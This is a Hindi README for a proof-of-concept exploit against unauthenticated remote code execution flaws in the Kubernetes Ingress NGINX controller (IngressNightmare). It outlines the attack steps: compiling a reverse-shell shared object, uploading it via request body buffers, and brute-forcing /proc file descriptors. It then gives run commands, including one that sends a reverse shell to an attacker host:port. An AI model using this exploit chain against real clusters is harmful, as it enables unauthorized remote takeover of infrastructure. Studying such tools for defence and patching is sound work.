
Ingress RCE के लिए PoC
यह प्रोजेक्ट Kubernetes के लिए Ingress NGINX कंट्रोलर में महत्वपूर्ण अनप्रमाणित रिमोट कोड निष्पादन (RCE) कमजोरियों को लक्षित करने वाला एक एक्सप्लॉइट प्रदान करता है, जिसे सामूहिक रूप से IngressNightmare कहा जाता है।
मूल शोध में, Wiz टीम ने कोई PoC या कार्यात्मक एक्सप्लॉइट प्रदान नहीं किया, इसलिए हमने अपना स्वयं का निर्माण करने और समुदाय के साथ साझा करने का निर्णय लिया।
Ingress NGINX कंट्रोलर Kubernetes वातावरण में व्यापक रूप से उपयोग किया जाने वाला घटक है, जो क्लस्टर के भीतर सेवाओं तक बाहरी पहुंच का प्रबंधन करता है। हाल की कमजोरियों (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974) ने महत्वपूर्ण सुरक्षा जोखिमों को उजागर किया है।
एक्सप्लॉइट इन मुख्य चरणों का पालन करता है:
शेयर्ड ऑब्जेक्ट जनरेट करें (इंजेक्ट किए गए ssl_engine गुण द्वारा उपयोग):
रिवर्स शेल पेलोड वाली .so लाइब्रेरी (evil_engine.so) संकलित करता है।
शेयर्ड ऑब्जेक्ट अपलोड करें:
अनुरोध हैंडलिंग (क्लाइंट बॉडी बफ़र्स) का लाभ उठाकर संकलित शेयर्ड ऑब्जेक्ट को इनग्रेस पॉड पर भेजता है। यहाँ ट्रिक कनेक्शन को खुला रखने के लिए सर्वर को एक अलग Content-Length भेजना है।
fd पर ब्रूट-फ़ोर्स: अपलोड की गई वस्तु को संदर्भित करने वाले सही डिस्क्रिप्टर की पहचान करने के लिए प्रक्रिया आईडी और फ़ाइल डिस्क्रिप्टर (/proc/{pid}/fd/{fd}) पर पुनरावृति करता है।
उपयोग
पूर्वापेक्षाएँ:
एक्सप्लॉइट चलाएँ:
pip3 install -r requirements.txt
python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](https://github.com/zwxxb/cve-2025-1974/blob/main/attacker_host%3Aport)
Ex: python3 poc.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443
कभी-कभी admission webhook एक अलग नेमस्पेस में होता है। इस मामले में, आपको अंत में नेमस्पेस निर्दिष्ट करने की आवश्यकता है, जैसे kube-system, default, या ingress-nginx।
<ingress_url>: लक्ष्य इनग्रेस URL (सार्वजनिक)<admission_webhook_url>: प्रवेश वेबहुक URL (आंतरिक वेबहुक)[attacker_host:port](https://github.com/zwxxb/cve-2025-1974/blob/main/attacker_host%3Aport): रिवर्स शेल के लिए आपका होस्ट और पोर्टअस्वीकरण
यह एक्सप्लॉइट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना लक्ष्यों के विरुद्ध इस उपकरण का अनधिकृत उपयोग निषिद्ध है। Hakai Security और QuimeraX इस उपकरण के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।